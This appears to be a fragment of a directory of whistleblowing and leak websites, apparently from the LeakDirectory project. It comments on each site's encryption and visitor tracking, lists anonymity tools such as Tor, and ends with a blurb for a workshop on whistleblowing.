CorruptionWatch.org.za – Corruption Watch – South Africa – Trades Union organised, anti-corruption pledge signatures, mapping of corruption hotspots, but no security or anonymity measures for contributors or informants at all except for “Leave this field empty, if you want to stay anonymous.“
Established Leak Sites
Websites which have been publishing censored or leaked material before, or independently in parallel with WikiLeaks
Public Intelligence – Public Intelligence website established 2009 – now back online in Luxembourg after server move from the Netherlands caused by “complaints” to the hosting company. Good Encryption, now no longer using Quantserve web bug tracking
FolhaLeaks – FolhaLeaks – Folha de S.Paulo, São Paulo, Brasil – no encryption, web form is not distinct from the main newspaper website so it betrays “anonymous” visitor details to FaceBook and to various banner advertisers etc.
Environmental Protection Whistle blowing sites
Leak Sites and Organization that accept reporting about environmental issues
NZ SIS – New Zealand Security Intelligence Service Public Contribution Form – no longer uses a hidden PGP key, still tracks IP address etc. and the rest of the website still tracks visitors with Google Analytics
Websites which have a specific topic, audience and editorial position and as part of their reporting have frequently published high level unpublished documents
Hints and Tips for Whistleblowers – ht4w.co.uk website – Technical Hints and Tips for protecting the anonymity of sources for Whistleblowers, Investigative Journalists, Campaign Activists and Political Bloggers etc.
Global Integrity Report Open-source metrics, indicators, and techniques for assessing transparent and accountable government. Strong whistleblowing protection law considered as an effective anti-corruption framework.
Public Concern at Work – UK Public Concern at Work NGO and legal advice centre set up in 1993 to address public interest whistleblowing: a) confidential advice to whistleblowers b) policy & campaigning c) public education (throughout UK, and to law/policy makers and all employers)
Whistle Blowing Consulting Businesses
Organization that do business related to WhistleBlowing and leaking (Consulting, Services, Press Agency middle men etc).
Charity and Profit organization that provide to public agencies and private corporation hotline services for whistleblowing in order to outsource the internal reporting service.
Public Concern at Work – UK Public Concern at Work A leading authority on making public interest whistleblowing work. Provide training, consultancy, audit support and access to advice line for organisations wanting to ensure they provide their staff a real alternative to silence.
GlobaLeaks – GlobaLeaks website – Open Source Whistleblowing Framework software project, which spawned this LeakDirectory.org wiki
Honest Appalachia – Honest Appalachia website – uses Tor Hidden Service and PGP and publishes its own Open Source documents submission website software and configuration scripts to help other similar whistleblowing projects
Whistle Blowing in Corporations
A Directory of corporations that implemented corporate transparency by implementing whistleblowing through the organization:
internalmemos.com Part of the fuckedcompany coverage of the internet bubble collapse. All of the 2002-2007 memos not behind the paywall are available from the internet archivehighlights include:
blackfridaywikileaks.com – Blackfriday wikileaks America – WordPress blog with no entries since June 2011, full of Google Analytics, Quantserve etc. visitor tracking, no encryption etc.
Encryption / Anonymity infrastructure services/ software used by some Whistleblower Sites
Tor – Tor project – encrypted anonymity router cloud – Tor Hidden Services and anonymised web browsing / web form submission (N.B. caveats)
The Workshop has been glued together with GlobaLeaks one, you can download slides here
SocialHacking LeakDirectorySocial Hacking
We will give an overview of what whistle blowing is and how it can be applied a wide array of different situations. Hopefully by the end of the workshop you will understand that whistle blowing is a fundamental tool for a democratic and transparent society.
We will focus in particular on the Leakdirectory Project, a shared crowd based initiative to represent most of the world of whistleblowing with the goal to became a reference for all the whistleblowing initiatives.
